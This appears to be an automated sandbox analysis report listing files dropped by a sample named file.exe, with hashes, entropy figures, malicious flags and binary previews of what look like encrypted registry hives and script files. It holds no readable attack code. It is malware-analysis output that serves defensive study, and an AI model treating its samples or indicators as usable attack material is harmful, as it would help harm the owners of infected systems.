          Entropy (8bit):7.977023608084727
          Encrypted:false
          SSDEEP:192:ZG9ax+BywyILfWK+IDCMBM3gNACp1ZinIZivhHYMPR7x:ZCahuL9+ItmoACPZ2tvhHBpx
          MD5:7923190C52C439503CB7402BA0076FAD
          SHA1:7C57A2C6C18ABDDADC5B27CE23E439DF60ADA26E
          SHA-256:6CA1CA10BAE6AC723D9DCCE5FCE0B6C927C49E6201130A7E2E58887D24D9B99E
          SHA-512:B7FE79DD72EEC239CAC4ADE2A7A5A7B399FAE6294704152AFC8354FF8699478484FA0CDC88E75035A38DF722A6BE68C2AECB25FE89A13FC572E9FBBB43EC80A9
          Malicious:false
          Preview:regf.L...h3$.x.~...lUW=.*......U..x.L......%...\@..^..........8u.A...."..M/._U.rQ.hB......#f..MQ.K{._...JY.(.`Q.e.............U..z.U..nL...d...[.WJ.>..(.Jz....(...w..0y......L.B.T.n....a5.R.&.J.Y.RL.3..._j.m...\W..?......Z.J...q..$.>..J.k.K..pL.....w....'...4.I.....<hXMB....j..x..)...U......u...-.... ...qQD..o^....v'....d.k..<..u.........[;"H.0Sv>Q..y."A.!+f.S....y{.Y......,..3{.o...|,...Pn.....b.Vb.1l=]Q,... p..fC.SQJ.|,.D..s..m.W.1...u9o.v[....I.&..F\z...@.....oJ..@AV..h>...~.eD..egj...&..,.o..G...r.H.....$..x..M..q...A..U.+&,.).Lqn.C..x............R...v..:.mNKJ.e..7.fmR..sED.G....:D...(..`.H...(J.m...pm4gu..]N..k....r..+.G..Y.}{nv.x9....Xd4..............3q\...O...s.....1... ..S.`....n.M.??=....^..A^k..$ad:...SI.,......t&....t6....^.. ..%.@+p.@.......N........J..`nm.7.Q!...$.p..'.P.....[hn.(.m.....i..M.V..(..{....N.2s.D..EnY....Q.."f.1..J)...........+..e..T.@=.P.Q..$....k.2s.#J)......\T%........B..JK6..${.__.v.R..){......k..5..W)...E<.1.}.T0..$.
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.976067229103762
          Encrypted:false
          SSDEEP:192:Z9eIsGAFTO2bKGSvUfqSFSkPy/YYi5S7v+gaZGsPtN88TWP8sRIkKJ:z1XG/SbUU+BZGsPLpYIJJ
          MD5:6EBA6AF2E46A4753605F595885C5372E
          SHA1:4C60D2E35996B4B5F87CA13631E1DF0D7E2A28E4
          SHA-256:73BE956FF9CA452E2753835D3430DCE88D2EC2C0BE794000ED36FF1194D56F3C
          SHA-512:87CF76D148D92AE0C0E3E2FCD62EF0E43F160945883961C6ED6B70AA71A864EFA8A783B32CEA921D61790C46A99AB0BE227725100DDBE0D0EBAC296DB60D5EFF
          Malicious:false
          Preview:regf.7....r.2*U'MRH9Cgh|joA..P.#.u$6..5..(_...x'..iLq...0...A...JB0.e..n.`.&.h....#".P...4,...9...=.aJ..DI.?..l.-...P............i.....f....H ...v.$O.............._..f6...Az7.4.....I.:...fJ.^q....V4S...u...F...9...#iA.......Z4.tS.^R.}.j.w..a......N0...`:p../J......]..Y.N._..L..v%.G...{.O..=6.M".YL.g..rZ.d o...m.(......N.U..M....,.\Up..d.4g../.Y3K......k.J.:...0..h4..8r........]....t=......-.~.O.&...%*]{.(<..i....X+=.@.nW....gS..d.h.I.7..a'z.aL.8.i?,.QXww.vn...C....^...O.f5......v.......{1..S_.:..O..9.KQ.j.I..T...o...p....3.&2n.O.)..f..tP.....+.......Qe....;.56....._J....!2p........J...`.:.\( ...c2...E.0,.....D.(.Rh$...(..;.h9...-.-....hs.U..J..........c...7._...&G....?.....\$B\RSm;....?~.YD.T.._..+..9ot..j..9..\6i.g.!....(.D.>...Tm.Nt<@..&.o;.B>sz.G..8........1n.J..w*.;K.@....2...Ug.KP...<a..+.q.u.o.!..Q..f...G.m...b../.[0..Fh."cX....3X....#.._.......1Z@.Y.B.S[.B...7..9....X..+..2.t....O...9...w..L....w}..._W.t.....H.V.....H.....K
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows registry file, NT/2000 or above
          Category:dropped
          Size (bytes):8526
          Entropy (8bit):7.976809444578835
          Encrypted:false
          SSDEEP:192:wAVMpFuM1dsjLCwWa8Sq8CtUx6R05LC7hdFfga1uF:xqIjLnx8SqbmCdFfP1uF
          MD5:527DE088C68A2CA7FD4E98EF33D62AB9
          SHA1:495268C14B9AB0C04FB0AF52777EA2C8D85B6ACF
          SHA-256:6AEEC1608B696412B090EFC31321CE3F3CBDC24BC506694B3629C96F002C321C
          SHA-512:FCFAB6980A06AF80E4F498D31543C30E50027F542187D0BA2BAB9FE8AE5A411E5210388EAFE94128CC6D22DC1E0C43C63427B1D97F1A671087924D421321079D
          Malicious:false
          Preview:regf..z.o,..I|....Q.4T....l...8......|.b....G.s.6.`."`.@.........r....k.........E...0...Ql.&w9r.......aCD;0I.3+~....nX .k...h.Z....*[.r*G`.....n....G..?.P7f\..m.f.Dk.1g..KY.T....?..)}B!z.s\.V{.y\.u@..Q.....w.^DPN......._........zE ...h..C..>...l..c.d.%=SK....z)t...F.2oy.....Q.e...V=.w.../...`-..~.v.y.4..#P.+A.....D............x.1...........Y0......r..j......gB7..^..f.X.i....F......gJ.......5}......iG...{.O.(....c.8..H.aI..]X.{<..\e....O*...|..3.. .9.Z~!9....Q.65.|.`....;.!..).../.s...M...{o.|.<<.t..?;.......(r..._.Y.....).bR.....?.......x9...[...Zm?.5.g.!p..E....P.]..#.2.A.....ifb..r%..|^b...A..O.X`X;!4/.......dV........h@p.K1..s...@..&.F...q...IUcF^./.<gR....4p.......X]z.1..5....L.Ju.P..4.hf....3]4w*."(C..e.Q.......z...7R...v..b.k..Hi..!t...E......?..H$..\..r.-.S...@FI./]s...u.k..8.+..pd......Ed.J9..5."7.p../PS|h...)Pmm5.......(.Jm.lX.....=:.H....&.....1.B.?E...._....V}.o..|G&.@...h.]...Y.9.0I).2........B:u1m....3.{e7.uc..4.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1573198
          Entropy (8bit):1.3307758186039
          Encrypted:false
          SSDEEP:3072:DjotyQwZTRBNlJ9ef2qO7i5M9cP0lHPFGf8op33EZukRyhUfdiYs7CceYlyath2v:DkDEzvJ9efTOuWlN0rUOqfLsG5YlyQq
          MD5:7C44561EB32BFA74A35CE84BEFE9F9F9
          SHA1:E561681482632216D1BE01AABD15C3A4ABE75128
          SHA-256:1996C8E3582F8FA77690BDBAE3318BACF6E8E06020AC9D8617084F37A300D911
          SHA-512:FFBA33B5B448A8A92DE55F9693692F2CCA28B911D2CF4AE849367021F38E74F6ABF5848B575396E233E0E6C04E87713A7F62AC027CAB77C6588EC3C3AB034DAE
          Malicious:false
          Preview:..`..V..3N.&v..UL.rR........gl..z7.*.H....8....-~..;...!.54.V...t.=.,...6~.0y..B....@}..'.i.uc.E.+~b..Q..`.l...K9.l.9.........L.."..P.2.D.n.i....G..q.].bCE8..:l.L.....I........}.0v..? ".b.f.eru..a..........*.....Z}..W8Voh.lmw]....H...6...h.....Lg......S........0.(n.!. .E2.tYI.U.9.<R...&;..P...8.e8.85.hj.RG...v.s..~>..P.k.?s.Q...*...:...D.A.....~#......_...._e....d.2....,z..[...7....Basv.+.....-.+1.......)^.O6...p..{.o.E..0vR....xQ.|.r..(Jz.....z.S..,.6.U-.k...A.....k...SL....9a[..k.p8.6e...H....=.p<.cge..i..Q.g.ZgS}..[qDY.I,..7..g....l...\E.Z.H...b.1....u..h...?>.].k.K|I.P.x.t.....s..........$..s....D....z.Jk ...ZL?#..h...1a...H..@..."IkmI.cS.:P=.:...|W..\......$..w.*.[. .kB=.V......6.l/.-...Ol..i...e.......@.....Y.nT.h]..l...@>.J..WRbj.T.<.g..,......h.V...+.lP-.......J..$..y..1g+.6....H...H...y..zio...|.t..Y.L.}.0$]...(..Ys.Q.."z...>.......c..M.ZG.:.k.f.*.?..V.A....h.....w.a...b......Z.=...`..U.]...[..~...#qYx=G"6y........j..k1
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):16718
          Entropy (8bit):7.987735131128868
          Encrypted:false
          SSDEEP:384:4n+73fFf/LR5CwkRuBYiv2iq24yAbqdBvDxqhuvpTKBNmtYkAD9:4+r9LR5YMey2iqP3bZuhWB1kAD9
          MD5:08D094013D252F12F66E430032CFE7E9
          SHA1:DFF12A9125947D30B9B07434A07992403198D727
          SHA-256:54D2098861DD8D85AAD9C355DD4CE8941FEED625B95FEDE6487A69966B5FB1C1
          SHA-512:D73C00E1DE5B713CADC31816B1F1E0BC9A91605A69C9A8F483D620E6FA40618411CD14EE799B8E9EFC82DA92233CE6DE15B63A0F814376A8AD70195565D738E0
          Malicious:false
          Preview:..d..8WL'.2..9r%m.!......|f..;.....b.W0..z,..._...i..@..a..mutV....mO./V...[.#../B8{l.....\l19..p.g.O....2D..}a.B.]#./.}fHU".8..|..Hl.'%(d.VXT...&r&.[...HV.......TESg....Y <<.5.M`".n.u$.....S....G6.W..S....M..}..c..o..h...D./JU,..~.....z..LHu%.%.... .S>..O.w....r^t.@....`^Ps..@..b..H..e[x..~.......~h..E4>M9+<O...25..~i.'i1...O.n.B....$..5.T3a.>.....1'....)A.....ls%....B.QY.j.rI.PZ.#..t.n.B...R61.*.'A......e.G.Wk...@.`.....=?....C#...]nR...M.*....?...OeQ.K...JV.+y."%.....l......G'T0.......g..Z>..{......W.}.%..[.5u.e.........|....*M..R..i...).....WUx..... L'd.HL.I@...`9....}Q."w.}..p4.LW...A.<~../2...u..NY._..i*L..l.;'h.5.........s.....3=D.0O.iJ..u...N.#{.@-v..{...T.\.5.dm..49U......J./.E.....E....)fd.9EB../..?..............L.j..R...u|.2.......+.Q...i^...0R....0z...5.st. ..\w........f..g..(...'e.pl....^&!...J..A7EY!ESYb]R..Rm..m.Es.....cv..$...)'...8&.K.....Md.e6.p... ..O.!...J..4.m.k.k.O..)]...u.+J..:4...>...L.3[D.;oIv...},F.2...Fk.K+...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):964
          Entropy (8bit):7.805992653778342
          Encrypted:false
          SSDEEP:24:B8sAcbe+u02Eyk6l+5mmf68THxEi4vSaC6jOgtQlbaDME67XBgiTkbD:a+uQbZTHMqyOokaxmXLiD
          MD5:296C3B4D28657D9F694F4BCA0FFD2BB3
          SHA1:06DE13C8A7975F118FEDE7B4CD3C531EC0ED0100
          SHA-256:ABB92FC275F08E95668D57ACEB09A217B21019FA8BF3CA7B5F3DC61EF5B452C8
          SHA-512:FFECE76F342E1EB6E1EF9923FB1046457A810DD75951073DA554A62EC199CD4E87BD626AA4EC735BB40BA48F8DD0F0526FD6F2078F83BA8EAA6612F7AE5BCF27
          Malicious:false
          Preview:.........t......P^^?SoC`"p..2.K........F*h9{..}........TC.*G...."..........NOY|...3..ba.jd`.$.j....'.8..f.b.YY.`.H....i...qk..S....C.....E..D+p...k3.M.....S.R....v....Te.....-..`n...I|..t.H...........b"`?6..j...7/:.Z..<.|...gb.H.H.G.....,zw.Uc(....:.n.}........I.8..I...v..}..m.f....}.#...W.L..._/...mV...R.\.at8D9....w...O./c)..C..+.y....j.x8..ks.b.Q..J......6....~u..CN/......7....2...."....C....[...F.ir#>.%;....0..R.n<x...L.f..%4..w...9.....Bw.c....c<...)....Kg.,.._.t...7.".J+..`.+..*...L!.u)7..y.....h. ....2...7.hN.N.r;..Y(|..9'..}..(.e....jE.p....R..x.=.Y...j....}.,.eyVv.......Q...$.?C..E....R.0Y.....x.X.0Qk.T...7q......W...}.........!=.|z..i.......lG..4w.........R.tG.K'........2E9...X...R...........+=Q.d....m..#...-].t..'..U..W-....Yg;..lj.:.Z:j....+y<..I.e?...@@....1.......8.#u.d.%p"....@.y..\..s.;..z.jko.....{w.......O..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):964
          Entropy (8bit):7.779367534438979
          Encrypted:false
          SSDEEP:24:G6Qaq433LaaE6MDZ+SQOM7325g3FDw3zYy99iTkbD:5zq49QwjWSaXCiD
          MD5:38E087754454225E900B058CB4A5F656
          SHA1:B37C83DB7367B3E0D44FBC2BC12C43269C74C731
          SHA-256:343E36CF9C1ED4992F92888CFA5723F70705A5CF99F22075B718D887ABF4FAD0
          SHA-512:E69AF5B706E5FD15396C684EDA7001BB97443B6D3F74448194BD722CC863154A1B2DE1ADC794C0FEFA285121616219E7B8D8179FEE3489737A8DBD0072C2B29F
          Malicious:false
          Preview:........(..?TW........d..1esA>}V..ZR$.}o.{V<.]O..0#.LG6.t3...L....<..I...i..i_.d-.M..)6.?.z..o.[FXN.e.OK..\.l"..b.>..c*j{i..j....u.B.&."..U...{..p.Y..ra.!...!.&$.y$%..Dv....V '.."..\...|..h.....v?@.H...^......s.|....K.d.|.....j.*....L M.......M,./A.Wm..vJ.b,Q.n]..U.3..q.t...J~!..Q2.lO.d.n.+..AQ<.Z.+.A_/.E.EA3.k.J.....].:b.r.......?......`.KxG...8....g;..3.._...'..D.......X.-.O..g.Q...6B./.qbF-.Ll.....z..i|p......gm\..u.7E....O3e}F....).~...7.U.~.l.Y+...b..... ........n[7.Y........Y..2..p%>.ix....zD5x.H...o$.....>..7[..t.\....X).S.#t........6.J ^5...t..+...!...zM....2>{[.l..I..0..&+.......9.s|.d.y$....r.N..o..W...!.'...Y...%.......s.J....l...D..........L..4.p....... BxGf\..Hf8...ns....X....(?.'...........W.......c2.|.3}..WcQ..y.V.j.....<..5.O@..L..<..r....U5....m.....I....../.-,...1LS.X&.....H6^...rW.)}....tM..q...%#.........u....f..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):91794
          Entropy (8bit):7.997998093927516
          Encrypted:true
          SSDEEP:1536:Rxz3QkXIv3rqhqqUsOh6MKSfLrI0x6Tb/chCF7tV9XXBrzsPaPKVmaLKGv0zlmHP:j3hIPrqhzU5YEk08zchCF7tPXxrzOaPc
          MD5:B4F5DDF1D40C3989E2B2A2E46E429CE8
          SHA1:3C5DBD7567C9F152C46541038861643AD6A0DC34
          SHA-256:169661185F0939145824C8D8F2C3F648DC2AF2CE8B687EF8ED60045E6972B74B
          SHA-512:4D25DFF042DB181E9D4DA1C91F7868721E7F31D530855904D6F2DBB0694B5304C16E5653A495AA6A29AA2C275B4A691FF5A4367805CD2F5E13F7393AC0B7A21D
          Malicious:true
          Preview:var W....r.;(..`e.Q..:..x..r.xM.Q.G*6..B..$..T..6bA.(.@..`C.w.........4....J.Wg....#.4.&M......F.q.p4^..".....U.....qYP_..w..4....K...a..6c.i..?.v.-.gP...j..)e.....i...Pk...@.j......a.x...!..Rd5.....Hx=I] ~.j1..o.F<..|7:i)...bu..z......7.^..W*^0..n.?......C.IJg.!..D......-I.......[Z<.=@o.@.>Lg!...?).xa..Z..[....U..J.Y.%.oP...`m......i.t_..b.-..4%U.<n5}.=d&...=...t.,x.H....C.rD.u..N.4.........%]h..9..%.....o....>...+Gt.,[....i.qW.E.g.H.e...h.C...L...!L7.5.=..t.pS...i.~............^6zi.6+..|s.......'9.C..3pb......t..Z1.>.by.....m.^V...2.,.g.....L..D..T).!2.y.(..........y.ktM..-..J.....\j...wcJ?.X...........E"3...,..(.y..%l.Fb.Nd3.....F..aB.X..0.T........".....I.Z.:@zR..H`j"..*.....w.J.X8.Q./..+/...tH.f...I..)..v..q6a............Ad."...-}...b....Q$.H..kd....Y..%.3.O&...Q.9)...6_.au-..OwX1?.C....0y..e:.0n...g+p...FG*.OD._6..3......9.N...*..}.T..<F..3....C......S.\.....P[7.C..%.ZtM.s...LLo`$v.Y....Z.)...4..[..w.........s.1P.&..s..,...Q=f.nL!....Q.{
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):15202
          Entropy (8bit):7.987781246234819
          Encrypted:false
          SSDEEP:384:nvwQScF3F7iMilyp2Xob2fQuDAwa6IrSp45wnJs7/hUh:YQSy3F7iBMl+tp4+Js7/hUh
          MD5:BD09083331CB152042EF4B7AB23F029E
          SHA1:D26BC929E4FA4AAE9D946C8B88CE08407E3E11ED
          SHA-256:3D4442657AEB8DF1C0A9163AB9CFBB3BF552E386B2BF7ECB30255526FE64F57A
          SHA-512:444785EBAD3F7DEE7CC7E2A1DC7877E73DCAA35E9E6F50D7A51B79AAA0F3BA44562B96011A12D42CED724C477AC07E0723BDCA7030A42E759749D35742C91A00
          Malicious:false
          Preview:var W..FXG(.e..+.n.V.......8..A.G...h......u...G:%ZF....x;k..7f/.U..:O..`1.G....>.....uw.N.......7..k...d..IUAR....]N..l....LQ....m..w.C$.%QY&........'..C.!0./...Mt...=.DX...*.9..4.4....:....".....3.|j".wVd.."...m8..c...|f...#z.*...V.ON..W.4.;......l...1......8....N..2......?0{.}.D...N.mo.T..5...xX..3.v.!.g....s.....".>#.#.w.H...#.H.P...Y..3.c=y......(...=.....t.&..-..O.?.,.Vi....?B*..{R$.p..y..0e.:...,,j;cV....._QD..p.:>.[V. .J...2.8...?.............5Q...XUF..F.K.Ne...[..m......s..C.)W_...]....=Yt..J{.Wk.Y|s._.S.w(@...L....H.............l..ZU.g['.m.Y....Pz. .._....Y3.w.~^0.ddH.9.;.29..D?.`P.2.?..M..%.q.n...Y.H..~.M....k./E..l....f..08....#g...............:9D.4.o`oQIL!...m|].v......":.... .c...#i#o....@.Zv.!...&sw.j....#"....N%..a+._0..-..x.....O1.W+r.*.yy..x.....S.....2.~...s..c.b...rw....-.({_......S.1......f-.W....J.../.+.rX(.q...c...r..]....n..&..;.k..v.Jc[]A./...;.I..kP.G.\|z.jpV....H..wZ...-.[..{..D...\........Ty.K..Pf...6......
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1284
          Entropy (8bit):7.828955049429854
          Encrypted:false
          SSDEEP:24:nmRenolJLgfjZO70gXk3ycnjpgsnmxwkTTxOuda4WHnFNe1piTkbD:nAenolNghgsycjpgsn6nTTu4WHve1oiD
          MD5:F1C9772549CF3497291F338688F45032
          SHA1:4A3F2460AD5024CFC559BB811D830C0DEB172760
          SHA-256:F138E1408FFB9D2954FBE59C9BD098CD00E67E1FFC9EA4D223E68EC9A13789E7
          SHA-512:86BA39BD8338CBCCCCD7CDBFF770346E2D198E73B24C820F83DC61E62CED3E7473DFF351CDCC0BD99011BF6522EF74AE45D1A645F4FD80B063EC6EAEDEF01171
          Malicious:false
          Preview:var W..]..x.@.../..g7zNE[...rQ.L.....S\.D&.;6<..Ca.........H....p...........,..L...1..)...)...$.;v....w..t....N.<.Ec..i..S....D..}T.s.HwN#lXk!............SU?g.#WA....Au..@.T.....@...W.XY.$........n],.YO.9.O... .J.....@\........2.......5..\^.+..i..I....@...#........}..{.....p."...j.e.<.A.mlsH....AV.....,L..[...B..d.W'.....\yG\f.IjO.w|.=.b..Z....#..1..7sj.......uQ.......E.1Z.>X..6..".v.a....&p.>.,.....D".]..:.B.Pm%W.....G..... ;......y......5.P..L..........j..!U...|k.k.S5<%.F..1.\...S!...\...G..-.K..\.....XH.|6b.?j..7>.w.4...B.;...x...`..Z...}...}...Q...#../.....0.QZL...x3..o....,u3G....r.y.....SdEY....$(gv).Gw....HO.r...|9...../)..o..^....9.....K.Xy..g..9.B.G[5.J....+l...&M[.S JmN_r..Z.#C.tz.S<..WQS.....T..bv...lCl..W...Tg.E+.].I....F._. ..4be..".j{....Fk.C.....^..Q}..2....U.CY.6=.'..A.......+..u$!..R...~...6..Y:.9Z.Z;....M.A.?.s`._..[....8."1!.=j.8...W.j.gQ....)b..?...&.....|..h.."..x.?..i.,d.. Q7J.}.!..u..~..L=5.8\.....#.3~...Iuxa....l_m.X
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):45781
          Entropy (8bit):7.995747548359194
          Encrypted:true
          SSDEEP:768:AZmefbcaHflB8ltWeYWTqlmHUQ8+ClsY7q+3EqOWLC5bosV9oqXOxAxFM:kmefB/H8lf3TqlY8+0eaLAoUoqXoAxy
          MD5:B4A3B566C0C50EAEE8B2B91B0B643191
          SHA1:140BED93CEE239F7E9BA82C2CD52828B71547135
          SHA-256:8A935C866B4A88224428442E7C16FF9A57550E7FCCB4E52093415CFFC17639D0
          SHA-512:CA8D59BC174482BC59766484F093671D482C3E12510449C2DF9C4CEBB1EADD64D7B9A6A492669162E227706A714FF20B9B33351F53E01A723A3BEAEE5EF9F127
          Malicious:true
          Preview:var W..$......O........8n[~?...Y....sh..N..p..E.r.nH.w}.,`3qk._.v.1..]V..$}.I._.*e...@[l...S! 9....l*...7.9.....i...'q..(..,,.6j........R........3...()OE...O.....B...d>.*{.t5.j..a.gA`..eU VK}..Zp..AC.@M..`..</.. 1 .....u.c...C...j...5mr.:b.h<W.zv(.a.lNs....wF...f..`.....9&S.^A$...I...[ds.^!.?....Nc.......?.......^g.g;C*Z<.{........L<h`n9!.6..1.@....glC8Y.b/.q..P....7.2.Y...M..>B.^.%.{.P#...90....a...Hn$......L.o.nf.S<.Q..30............. v.....d...a7I..^]#..WK.zo.A...2..CV.K.cA.^=..3,.q...*.NW..{.............~..z........M.Rm,.........X0...i...{#.....J.r.....Hq...?sR....X{..D.,j...j`z...=..w.&....e..&t....+*...hB&......}.c.^e.W.<.b9`..uH.Z.d(...........S.s]e}d...oN...o.!5..H.c...u.KU4...`i..x..{.s.Po<.y..3.v....#.o.=a1.*D....z..).\.w.sl.P.H(....y..=.}.W<{8...D.e.`..I"^..W.R.T...Nd.Z..<.....Q.'......<........^..=...j..:.......R.Q..B..yp......#...)(...Ne...........,.?2|.k..B..../..L.5]f...h.....u.L../..Fx&;.=.._V3,...{6........O.U....L..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):349229
          Entropy (8bit):7.126884245406676
          Encrypted:false
          SSDEEP:6144:8X8IUKgpmfk8eXAmdB0J4619Szx4LV7FF8uMkzhbwnf0NPC8Qib3fb7hWjHh:68PpHXmJ40Mt4LVRF8uGiU
          MD5:5484071834ACFE84AAC3E2B09FC738EF
          SHA1:A4FA750752620AF27750268DCDBD1C7A0FA460E6
          SHA-256:6E8CF1ED5487C2C40B97A850C6E84ADD65DDDB3BC9043ED7BD9500FEDB56263C
          SHA-512:02D415A54B9FBA763C1D0BA858F913CF814C079DFED664E0B8836BCE2B9D0926B4EB0F8377648DB0CEF52A94EBC2F05D17B1325B2F28FAAE1F9316E7D50F1AD6
          Malicious:false
          Preview:var W.14.Mg.\.p_9.....Y.o...%.Y...x....=.X...s..;.../....i..=cO........%l...S;.B.h.+....T..*ho......+.<..I)o".}S..."D..&l*O.....B...<...[rXp........2.A+..|........#.T.@..).I.....}.G.ot....+#.....y.$.]N.C.....O.c..M....+..P.F.F~.5..'..+.^b?<.C:..O&J..N..-...|...(`.4.....J.).......Q..B.0....u...#..%."..:V.,2.0.&p.M.n.o$...-..l.W..XSk.(.f.sZR.j....s..\2q.....N.,.{..%p../?...pQ|....E|..-O.k>.....I..V.l...H/..q'.f.]c.....LkH..{ou].:..J..Z6.o~O..`Y;..E....*.}(..8..XR.k..j..F._<.E........j.*....w:.[.....4VU..1.j......~. #.0.......i..k>.)e$4EXk_...VQ..A.......N'........B`.......8{Cu.?....;.H.#.&.+.p..%....:s..pe..1.[I..Z.3..2..{:.....R........?5.<....st.N].#...4.!qb..>.......A....X.L..I...:...- z.1.<.6K0'.u.I].[.P...f..n....}..N:;.?0+.xu;2pjZ..ZU"...xFz.... .W.2..E..m..G^7L..[x...L.4.%.9.O2.T...~.M.m53om:..;..wv'.)L..../..?..f....M."..x..V.....0_..d..d...A.M~0W,,j.Z..yP....d..r...a.WO,b....QX/....8.....U......$.[k.....5e...Q.v-..5..,z..F...?..}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):127792
          Entropy (8bit):7.998496899272712
          Encrypted:true
          SSDEEP:3072:NRCHGKJHhm+Kkq9/oY3aEJ8TXbjHK0hXGJYroktfDgQIvqQ:+mKJBmPowJ4r9h22rptfDYqQ
          MD5:6A360B992B26FF38D22BA80895651A84
          SHA1:C43C517B2D3F337E1E49D182189F6FBEC4483C82
          SHA-256:EE0578E1513D8C923296EEC0E93A7BF437F53BBDD23D5ED1D78B3FE2F182C958
          SHA-512:B91CB7F610E5FAC5CA4CA8008F82E13F4D660CD644F4D62D5E7C13A83E4FAA4975A7ECCEFCD6A3CE9D0B7B013E16427B907ADB6F482CDA57D658923F6D35571C
          Malicious:true
          Preview:(func|_...w.n.IX..>J.@..Q...^.....^.P.$|.B....I..\..x{vw....s...M.V-.h.1...1/Zc.5sK\...>y).*.2.$.........ca..,WQB.G.;zJ.v.1.u...$...M...."....d.....,....YPV......Xp.s..z....H..E..^.....e..6SZ......Q}.'..t..mR....`FI6l....0w.._..^`......P1..T"_^/.]..NT..J.".w..{..).[...wG..+FYq...g..Ng..w{.vm.'..k.....A...NE......or..h..@.^.C...4L.........C.`..3g'...h.Q.....C.<{.....vjh...2:3... ...Z$.l.i.H..sr1..........(..AA..?.O.e.l....=... N'.P..%.@.:J[.eM.Y.@8..`...)U9H...P.m1u.y.Z.X..`.|.dX...r.5!....7.u.......z.~S.}?NV.X.J.h..N.J...o....'....^z......Y.6.+....N...R!..6..Ww.....`j.!.I.%.a.|.j).UK..].W.Dd.r.z_.....M.`.H..@A..Am;.F.".(E..1.>..%..C.G.=.d..8KD:..8..2.yq.353]....EU.+..~/.t.(...US..Y........aK^.1./.|...(!W...^::pol..Eml..H.;B....X.......y.>..S..b+kk.....M.d.J.Wu..+...5....}"..6qB;....$....<e1..9.....w.2.X.s.........lh`...=....y.....w.f.s.c..Z..}...%.>.%f...3..{. 0.......^.Ps...j.U......m..>.=+..q....o.7.k.l.G..)....d.j.gh.:.......O.Fs..;*:....W.,\
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):234417
          Entropy (8bit):7.615411301900928
          Encrypted:false
          SSDEEP:6144:D0GYIuSIPmYz7vGhs+9JShJkognkW6MUHwaXl+0SEDtMLoc6jxET7:HgeYzjGlqJkognkW6MUHwaXl+0SEO360
          MD5:C7C3C5AB35E30BF6C91118C448C5F5E6
          SHA1:375BE601C83A24AE044CB6D395D114AEAEBC25CF
          SHA-256:F2DF9C62CE3538A70B0BAE945D5FD4AC76BA554FE8D816940789ED0BBBBBFA57
          SHA-512:81CD3AF92D280CF2638C0D6C1D9D1232F91F20588395FC32260B70BEB578F54C02F194FA79A421DE3C42425FFBF93CADD6317BF86A907F85718605B5D0F40FB6
          Malicious:false
          Preview:var W.Kx....9H.!.i..Y.._.3?{..^..;.o...C.;.......@...S..?1D^......".+[u.....h.v.w,......v.4.{3......Z.Zt...0(..=`....n....-1.l.]31.L..R?Z.(.\S...Q..R..Gle.N..%.?..i.4>...;.t?.z5(.b.qPv.D..g]:..sd-..$....r|..A_a.~.=1.(k.......u.Op..k>.t.]>;,*..a.......\.......H. eI....%...bL.h;-..gT.m.G..-..^Q..-Rmd[p...1.G;...Z.-QpM.8.9.(....\.?......;...Cs*.._J2q.<N..2......c..=.2..M..C.d......I.^..7...K.E.D.wo..Bp{..6./..B:.UF..RHk.;3.G....9iSa)o9.l.b{eb...r..k....zX..t..!../...+..........W......i.}...2\..J.Yo..[.Z..w.<.Z.r...qZ.l_.dX.....a7..{J%.4H6.9E>3/.7...t.hs'f.T..!Bx..@........P.\...V.e.$..O`].$.$.'38...........v....&.....3WKR...S"d.'.w.,...).t..*...j.v..,...?O...H.T}....m..I)..Z.,..(Y.q.+..kc..1.[..(T.FqvD.....7s.m..5.yL4 O.....e..z...0..(oZ..-!|.=.}.....>..l.....G.v.7.O..F..w....c. .&....v.j..MG/..{S..8$e...H;B..,.~....&Z/.L..x#...R...E>r.L.<'W..)ig........9.\..lU)g..{..Dv.%......a..BC..*..o...<...'.<.P..&.3....8{.U.......y......K.[;{7.d."e.DA....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2436
          Entropy (8bit):7.915285554499908
          Encrypted:false
          SSDEEP:48:BymfV0nL0sZRPdEnroqIYgqcOIfL4Pp662hkG7ib+7OS0aiD:gmfeL5FEnnNgqcOvPm2b+ySi
          MD5:617A22C8897AFBE00F46C25A151201E7
          SHA1:F9A6C138AD207D3B4D00898F9D35218F8D998D5F
          SHA-256:19A7EF2C93A5FDD9258A3B1957E9B401247CE19EE564A4A9228C477137536E57
          SHA-512:9D7F61F88B01388A15DEB7A3A25C210C3BA00F324B2498D7B71616A3009D56CC2F1604AA7439571EF522355295D66E3B140A23F237E6EFB8A5C5598288203A66
          Malicious:false
